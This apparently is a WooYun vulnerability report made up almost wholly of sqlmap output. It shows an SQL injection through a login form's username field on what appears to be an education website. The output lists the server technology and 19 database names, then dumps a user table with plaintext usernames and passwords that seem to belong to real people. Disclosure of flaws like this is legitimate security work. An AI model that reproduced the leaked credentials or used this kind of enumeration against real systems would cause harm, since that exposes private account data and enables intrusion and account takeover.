WooYun.org

there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[09:51:22] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Microsoft SQL Server 2005
[09:51:22] [INFO] fetching database names
[09:51:22] [INFO] the SQL query used returns 19 entries
[09:51:22] [INFO] starting 10 threads
[09:51:22] [INFO] resumed: "BBNEduBlog"
[09:51:22] [INFO] resumed: "BBNEduDev"
[09:51:22] [INFO] resumed: "BBNEduGK"
[09:51:22] [INFO] resumed: "BBNEduSearch"
[09:51:22] [INFO] resumed: "EduShop"
[09:51:22] [INFO] resumed: "kaoshi"
[09:51:22] [INFO] resumed: "model"
[09:51:22] [INFO] resumed: "luck"
[09:51:22] [INFO] resumed: "school"
[09:51:22] [INFO] resumed: "schoold"
[09:51:22] [INFO] resumed: "tempdb"
[09:51:22] [INFO] resumed: "TRSWCMV65"
[09:51:22] [INFO] resumed: "WebBlog"
[09:51:22] [INFO] resumed: "www_bbn_com_cn_edu"
[09:51:22] [INFO] resumed: "www_bbn_com_cn_edu_bbs"
[09:51:22] [INFO] resumed: "www_bbn_com_cn_kaoshi"
[09:51:22] [INFO] resumed: "msdb"
[09:51:22] [INFO] resumed: "QuestSoftware"
[09:51:22] [INFO] resumed: "master"
available databases [19]:                                                                                                                                                                      
[*] BBNEduBlog
[*] BBNEduDev
[*] BBNEduGK
[*] BBNEduSearch
[*] EduShop
[*] kaoshi
[*] luck
[*] master
[*] model
[*] msdb
[*] QuestSoftware
[*] school
[*] schoold
[*] tempdb
[*] TRSWCMV65
[*] WebBlog
[*] www_bbn_com_cn_edu
[*] www_bbn_com_cn_edu_bbs
[*] www_bbn_com_cn_kaoshi

Database: luck                                                                                                                                                                                  
Table: dbo.tb1_user                                                                                                                                                                             
[100 entries]                                                                                                                                                                                   
+------+------------+--------------+                                                                                                                                                            
| u_id | u_password | u_username   |
+------+------------+--------------+
| 1    | qiegai     | beilu3197    |
| 10   | gangzi     | pupu320      |
| 100  | tanyou20   | xinji97258   |
| 1000 | gushan     | youzhi118179 |
| 1001 | guailia    | zalie3503    |
| 1002 | paza748    | jieyou       |
| 1003 | qiunao58   | huangjie6134 |
| 1004 | xixian     | haiji43944   |
| 1005 | feishi1    | menglian6    |
| 1006 | touyou     | xianjia1     |
| 1007 | namei98    | chuibi6013   |
| 1008 | jique2     | anxian996    |
| 1009 | zhanglu    | zhiping8     |
| 101  | beina22    | tanhan13     |